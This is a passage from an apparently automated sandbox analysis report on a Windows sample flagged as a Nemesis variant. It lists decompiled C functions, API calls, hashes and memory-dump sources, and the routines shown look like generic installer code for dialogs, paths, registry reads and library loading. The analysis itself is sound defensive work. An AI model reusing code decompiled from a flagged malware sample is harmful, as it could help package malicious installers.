                                                                          									 *(__esi + 0x1c) = __eax;
                                                                          									L21:
                                                                          									 *__edi = __eax;
                                                                          									goto L27;
                                                                          								case 5:
                                                                          									__eax = GlobalAlloc(0x40, 0x10);
                                                                          									_push(__eax);
                                                                          									 *(__esi + 0x1c) = __eax;
                                                                          									_push(__ebp);
                                                                          									 *__edi = __eax;
                                                                          									__imp__CLSIDFromString();
                                                                          									goto L27;
                                                                          								case 6:
                                                                          									if( *__ebp != __cx) {
                                                                          										__eax = E10001311(__ebp);
                                                                          										 *__ebx = __eax;
                                                                          									}
                                                                          									goto L27;
                                                                          								case 7:
                                                                          									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                                                          									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                                          									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                                                          									asm("cdq");
                                                                          									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
                                                                          									goto L27;
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          					L9:
                                                                          					_t37 = E1000122C(0x10004044);
                                                                          					goto L10;
                                                                          				}
                                                                          			}












                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                                            • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                          • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                          • String ID:
                                                                          • API String ID: 4216380887-0
                                                                          • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                          • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                                          • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                                          • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
                                                                          				_Unknown_base(*)()* _t7;
                                                                          				void* _t10;
                                                                          				int _t14;
                                                                          
                                                                          				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
                                                                          				_t10 = GlobalAlloc(0x40, _t14);
                                                                          				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
                                                                          				_t7 = GetProcAddress(_a4, _t10);
                                                                          				GlobalFree(_t10);
                                                                          				return _t7;
                                                                          			}







                                                                          APIs
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29266932000.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000001.00000002.29266891366.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29266969679.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000001.00000002.29267005182.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_10000000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                          • String ID:
                                                                          • API String ID: 1148316912-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00401D57() {
                                                                          				void* _t18;
                                                                          				struct HINSTANCE__* _t22;
                                                                          				struct HWND__* _t25;
                                                                          				void* _t27;
                                                                          
                                                                          				_t25 = GetDlgItem( *(_t27 - 8),  *(_t27 - 0x24));
                                                                          				GetClientRect(_t25, _t27 - 0x58);
                                                                          				_t18 = SendMessageW(_t25, 0x172, _t22, LoadImageW(_t22, E00402C37(_t22), _t22,  *(_t27 - 0x50) *  *(_t27 - 0x20),  *(_t27 - 0x4c) *  *(_t27 - 0x20), 0x10));
                                                                          				if(_t18 != _t22) {
                                                                          					DeleteObject(_t18);
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t27 - 4));
                                                                          				return 0;
                                                                          			}








                                                                          APIs
                                                                          • GetDlgItem.USER32(?,?), ref: 00401D5D
                                                                          • GetClientRect.USER32(00000000,?), ref: 00401D6A
                                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D8B
                                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D99
                                                                          • DeleteObject.GDI32(00000000), ref: 00401DA8
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                          • String ID:
                                                                          • API String ID: 1849352358-0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 59%
                                                                          			E00401C19(intOrPtr __edx) {
                                                                          				int _t29;
                                                                          				long _t30;
                                                                          				signed int _t32;
                                                                          				WCHAR* _t35;
                                                                          				long _t36;
                                                                          				int _t41;
                                                                          				signed int _t42;
                                                                          				int _t46;
                                                                          				int _t56;
                                                                          				intOrPtr _t57;
                                                                          				struct HWND__* _t61;
                                                                          				void* _t64;
                                                                          
                                                                          				_t57 = __edx;
                                                                          				_t29 = E00402C15(3);
                                                                          				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                          				 *(_t64 - 0x10) = _t29;
                                                                          				_t30 = E00402C15(4);
                                                                          				 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                          				 *(_t64 + 8) = _t30;
                                                                          				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
                                                                          					 *((intOrPtr*)(__ebp - 0x10)) = E00402C37(0x33);
                                                                          				}
                                                                          				__eflags =  *(_t64 - 0x14) & 0x00000002;
                                                                          				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
                                                                          					 *(_t64 + 8) = E00402C37(0x44);
                                                                          				}
                                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
                                                                          				_push(1);
                                                                          				if(__eflags != 0) {
                                                                          					_t59 = E00402C37();
                                                                          					_t32 = E00402C37();
                                                                          					asm("sbb ecx, ecx");
                                                                          					asm("sbb eax, eax");
                                                                          					_t35 =  ~( *_t31) & _t59;
                                                                          					__eflags = _t35;
                                                                          					_t36 = FindWindowExW( *(_t64 - 0x10),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                                                                          					goto L10;
                                                                          				} else {
                                                                          					_t61 = E00402C15();
                                                                          					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                          					_t41 = E00402C15(2);
                                                                          					 *((intOrPtr*)(_t64 - 0x4c)) = _t57;
                                                                          					_t56 =  *(_t64 - 0x14) >> 2;
                                                                          					if(__eflags == 0) {
                                                                          						_t36 = SendMessageW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8));
                                                                          						L10:
                                                                          						 *(_t64 - 0x30) = _t36;
                                                                          					} else {
                                                                          						_t42 = SendMessageTimeoutW(_t61, _t41,  *(_t64 - 0x10),  *(_t64 + 8), _t46, _t56, _t64 - 0x30);
                                                                          						asm("sbb eax, eax");
                                                                          						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                          					}
                                                                          				}
                                                                          				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
                                                                          				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
                                                                          					_push( *(_t64 - 0x30));
                                                                          					E004061C9();
                                                                          				}
                                                                          				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                                          				return 0;
                                                                          			}
















                                                                          APIs
                                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 77%
                                                                          			E00404AA2(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                          				char _v68;
                                                                          				char _v132;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				signed int _t23;
                                                                          				signed int _t24;
                                                                          				void* _t31;
                                                                          				void* _t33;
                                                                          				void* _t34;
                                                                          				void* _t44;
                                                                          				signed int _t46;
                                                                          				signed int _t50;
                                                                          				signed int _t52;
                                                                          				signed int _t53;
                                                                          				signed int _t55;
                                                                          
                                                                          				_t23 = _a16;
                                                                          				_t53 = _a12;
                                                                          				_t44 = 0xffffffdc;
                                                                          				if(_t23 == 0) {
                                                                          					_push(0x14);
                                                                          					_pop(0);
                                                                          					_t24 = _t53;
                                                                          					if(_t53 < 0x100000) {
                                                                          						_push(0xa);
                                                                          						_pop(0);
                                                                          						_t44 = 0xffffffdd;
                                                                          					}
                                                                          					if(_t53 < 0x400) {
                                                                          						_t44 = 0xffffffde;
                                                                          					}
                                                                          					if(_t53 < 0xffff3333) {
                                                                          						_t52 = 0x14;
                                                                          						asm("cdq");
                                                                          						_t24 = 1 / _t52 + _t53;
                                                                          					}
                                                                          					_t25 = _t24 & 0x00ffffff;
                                                                          					_t55 = _t24 >> 0;
                                                                          					_t46 = 0xa;
                                                                          					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                          				} else {
                                                                          					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                          					_t50 = 0;
                                                                          				}
                                                                          				_t31 = E004062A4(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                          				_t33 = E004062A4(_t44, _t50, _t55,  &_v132, _t44);
                                                                          				_t34 = E004062A4(_t44, _t50, 0x42d248, 0x42d248, _a8);
                                                                          				wsprintfW(_t34 + lstrlenW(0x42d248) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                          				return SetDlgItemTextW( *0x433eb8, _a4, 0x42d248);
                                                                          			}




















                                                                          APIs
                                                                          • lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00435000), ref: 00404B43
                                                                          • wsprintfW.USER32 ref: 00404B4C
                                                                          • SetDlgItemTextW.USER32(?,0042D248), ref: 00404B5F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                          • String ID: %u.%u%s%s
                                                                          • API String ID: 3540041739-3551169577
                                                                          • Opcode ID: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                                          • Instruction ID: a69b8d9c405cb410f429d1b91b3aaf5cd8934f07bb3ea9cf38393447591b3b6c
                                                                          • Opcode Fuzzy Hash: c9a6e7e492f6bdeefc1d450629950baf89c1ca8cbbe940ede2bd0e57b0caaae8
                                                                          • Instruction Fuzzy Hash: EA11EB736041283BDB00A66DDC42E9F369CDB81338F154237FA66F21D1D9B8D82146E8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00405BFE(WCHAR* _a4) {
                                                                          				WCHAR* _t5;
                                                                          				short* _t7;
                                                                          				WCHAR* _t10;
                                                                          				short _t11;
                                                                          				WCHAR* _t12;
                                                                          				void* _t14;
                                                                          
                                                                          				_t12 = _a4;
                                                                          				_t10 = CharNextW(_t12);
                                                                          				_t5 = CharNextW(_t10);
                                                                          				_t11 =  *_t12;
                                                                          				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                                                                          					if(_t11 != 0x5c || _t12[1] != _t11) {
                                                                          						L10:
                                                                          						return 0;
                                                                          					} else {
                                                                          						_t14 = 2;
                                                                          						while(1) {
                                                                          							_t14 = _t14 - 1;
                                                                          							_t7 = E00405B80(_t5, 0x5c);
                                                                          							if( *_t7 == 0) {
                                                                          								goto L10;
                                                                          							}
                                                                          							_t5 = _t7 + 2;
                                                                          							if(_t14 != 0) {
                                                                          								continue;
                                                                          							}
                                                                          							return _t5;
                                                                          						}
                                                                          						goto L10;
                                                                          					}
                                                                          				} else {
                                                                          					return CharNextW(_t5);
                                                                          				}
                                                                          			}










                                                                          APIs
                                                                          • CharNextW.USER32(?,?,C:\,?,00405C72,C:\,C:\,?,?,75523420,004059B0,?,C:\Users\user\AppData\Local\Temp\,75523420,00000000), ref: 00405C0C
                                                                          • CharNextW.USER32(00000000), ref: 00405C11
                                                                          • CharNextW.USER32(00000000), ref: 00405C29
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CharNext
                                                                          • String ID: C:\
                                                                          • API String ID: 3213498283-3404278061
                                                                          • Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                          • Instruction ID: 71472b9638db6d5cc2cef3a2d8db9d1c11fc55a0834b756b62a4f8b04705d027
                                                                          • Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
                                                                          • Instruction Fuzzy Hash: B7F09662908F1555FF317A945C45ABB57B8DB54BA0B00C83BD602B72C0E3B85CC58E9A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 58%
                                                                          			E00405B53(WCHAR* _a4) {
                                                                          				WCHAR* _t9;
                                                                          
                                                                          				_t9 = _a4;
                                                                          				_push( &(_t9[lstrlenW(_t9)]));
                                                                          				_push(_t9);
                                                                          				if( *(CharPrevW()) != 0x5c) {
                                                                          					lstrcatW(_t9, 0x40a014);
                                                                          				}
                                                                          				return _t9;
                                                                          			}





                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 00405B59
                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403360,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 00405B63
                                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405B75
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B53
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: CharPrevlstrcatlstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2659869361-3355392842
                                                                          • Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                          • Instruction ID: 33d5b4b63083ad43afaa288e046e1f08ed21b79f7f5b9eb46acb358563388364
                                                                          • Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
                                                                          • Instruction Fuzzy Hash: 86D05E31101924AAC121BB549C04DDF63ACAE86304342087AF541B20A5C77C296286FD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00402E5D(intOrPtr _a4) {
                                                                          				long _t2;
                                                                          				struct HWND__* _t3;
                                                                          				struct HWND__* _t6;
                                                                          
                                                                          				if(_a4 == 0) {
                                                                          					__eflags =  *0x422a00; // 0x0
                                                                          					if(__eflags == 0) {
                                                                          						_t2 = GetTickCount();
                                                                          						__eflags = _t2 -  *0x434ef0;
                                                                          						if(_t2 >  *0x434ef0) {
                                                                          							_t3 = CreateDialogParamW( *0x434ee0, 0x6f, 0, E00402DD7, 0);
                                                                          							 *0x422a00 = _t3;
                                                                          							return ShowWindow(_t3, 5);
                                                                          						}
                                                                          						return _t2;
                                                                          					} else {
                                                                          						return E00406698(0);
                                                                          					}
                                                                          				} else {
                                                                          					_t6 =  *0x422a00; // 0x0
                                                                          					if(_t6 != 0) {
                                                                          						_t6 = DestroyWindow(_t6);
                                                                          					}
                                                                          					 *0x422a00 = 0;
                                                                          					return _t6;
                                                                          				}
                                                                          			}







                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
                                                                          • GetTickCount.KERNEL32 ref: 00402E8E
                                                                          • CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
                                                                          • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                          • String ID:
                                                                          • API String ID: 2102729457-0
                                                                          • Opcode ID: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                          • Instruction ID: fb236cf74f4011b48551144809540ae7a3d608603197ef92b98d1837a73ee17d
                                                                          • Opcode Fuzzy Hash: 081ae59ec46762087058598088bc932b8811e33f16b6ee3d01574ac3e4d85d66
                                                                          • Instruction Fuzzy Hash: BDF05E30941620EBC6316B20FF0DA9B7B69BB44B42745497AF441B19E8C7B44881CBDC
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 89%
                                                                          			E0040525A(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                          				int _t15;
                                                                          				long _t16;
                                                                          
                                                                          				_t15 = _a8;
                                                                          				if(_t15 != 0x102) {
                                                                          					if(_t15 != 0x200) {
                                                                          						_t16 = _a16;
                                                                          						L7:
                                                                          						if(_t15 == 0x419 &&  *0x42d234 != _t16) {
                                                                          							_push(_t16);
                                                                          							_push(6);
                                                                          							 *0x42d234 = _t16;
                                                                          							E00404C30();
                                                                          						}
                                                                          						L11:
                                                                          						return CallWindowProcW( *0x42d23c, _a4, _t15, _a12, _t16);
                                                                          					}
                                                                          					if(IsWindowVisible(_a4) == 0) {
                                                                          						L10:
                                                                          						_t16 = _a16;
                                                                          						goto L11;
                                                                          					}
                                                                          					_t16 = E00404BB0(_a4, 1);
                                                                          					_t15 = 0x419;
                                                                          					goto L7;
                                                                          				}
                                                                          				if(_a12 != 0x20) {
                                                                          					goto L10;
                                                                          				}
                                                                          				E00404263(0x413);
                                                                          				return 0;
                                                                          			}






                                                                          APIs
                                                                          • IsWindowVisible.USER32(?), ref: 00405289
                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004052DA
                                                                            • Part of subcall function 00404263: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404275
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmp
                                                                          Similarity
                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                          • String ID:
                                                                          • API String ID: 3748168415-3916222277
                                                                          • Opcode ID: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                          • Instruction ID: e35359e86d41fb5d6968ee62a371e6abd11f03428b82ac61abb391d392e116c6
                                                                          • Opcode Fuzzy Hash: 3fd7a5bdf8e2bcd8409f4f3104da706e70a9a66b0760f7062862c6eded0751b7
                                                                          • Instruction Fuzzy Hash: 0E017131510609ABDF209F51DD84A5B3A25EF84754F5000BBFA04751D1C77A9C929E6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 90%
                                                                          			E00406150(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                          				int _v8;
                                                                          				long _t21;
                                                                          				long _t24;
                                                                          				char* _t30;
                                                                          
                                                                          				asm("sbb eax, eax");
                                                                          				_v8 = 0x800;
                                                                          				_t21 = E004060EF(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                          				_t30 = _a16;
                                                                          				if(_t21 != 0) {
                                                                          					L4:
                                                                          					 *_t30 =  *_t30 & 0x00000000;
                                                                          				} else {
                                                                          					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                          					_t21 = RegCloseKey(_a20);
                                                                          					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                          					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                          						goto L4;
                                                                          					}
                                                                          				}
                                                                          				return _t21;
                                                                          			}








                                                                          APIs
                                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063C4,80000002), ref: 00406196
                                                                          • RegCloseKey.ADVAPI32(?,?,004063C4,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbA35F.tmp\System.dll), ref: 004061A1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID: Call
                                                                          • API String ID: 3356406503-1824292864
                                                                          • Opcode ID: f215a2074a9fc440f4a1777f7a3a550b5582584351027f12a6dd0badbbe4df1b
                                                                          • Instruction ID: ccae29ee16f81b62eed190a0e72f85d1395cd89474178e8bc9e2f9375c5b4726
                                                                          • Opcode Fuzzy Hash: f215a2074a9fc440f4a1777f7a3a550b5582584351027f12a6dd0badbbe4df1b
                                                                          • Instruction Fuzzy Hash: C7017172510209EADF21CF55CD05EDF3BA8EB54360F018035FD1596191D779D968CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E004038FB() {
                                                                          				void* _t2;
                                                                          				void* _t3;
                                                                          				void* _t6;
                                                                          				void* _t8;
                                                                          
                                                                          				_t8 =  *0x42b20c;
                                                                          				_t3 = E004038E0(_t2, 0);
                                                                          				if(_t8 != 0) {
                                                                          					do {
                                                                          						_t6 = _t8;
                                                                          						_t8 =  *_t8;
                                                                          						FreeLibrary( *(_t6 + 8));
                                                                          						_t3 = GlobalFree(_t6);
                                                                          					} while (_t8 != 0);
                                                                          				}
                                                                          				 *0x42b20c =  *0x42b20c & 0x00000000;
                                                                          				return _t3;
                                                                          			}








                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75523420,004038D3,004036E9,00000006,?,00000006,00000008,0000000A), ref: 00403915
                                                                          • GlobalFree.KERNEL32(?), ref: 0040391C
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040390D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Free$GlobalLibrary
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 1100898210-3355392842
                                                                          • Opcode ID: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                          • Instruction ID: e66732d9f8c7dde22b06ec40e1a6716a7c13e86cf839674f34118547447e98ef
                                                                          • Opcode Fuzzy Hash: 458fb59c7289fd05ef48150b7000eed9d6dd19151a6e1d3204a1ea3f1dd8076b
                                                                          • Instruction Fuzzy Hash: 95E012739019209BC6215F55ED08B5E7B68AF58B22F05447AE9807B26087B45C929BD8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 77%
                                                                          			E00405B9F(WCHAR* _a4) {
                                                                          				WCHAR* _t5;
                                                                          				WCHAR* _t7;
                                                                          
                                                                          				_t7 = _a4;
                                                                          				_t5 =  &(_t7[lstrlenW(_t7)]);
                                                                          				while( *_t5 != 0x5c) {
                                                                          					_push(_t5);
                                                                          					_push(_t7);
                                                                          					_t5 = CharPrevW();
                                                                          					if(_t5 > _t7) {
                                                                          						continue;
                                                                          					}
                                                                          					break;
                                                                          				}
                                                                          				 *_t5 =  *_t5 & 0x00000000;
                                                                          				return  &(_t5[1]);
                                                                          			}






                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BA5
                                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00402F2D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BB5
                                                                          Strings
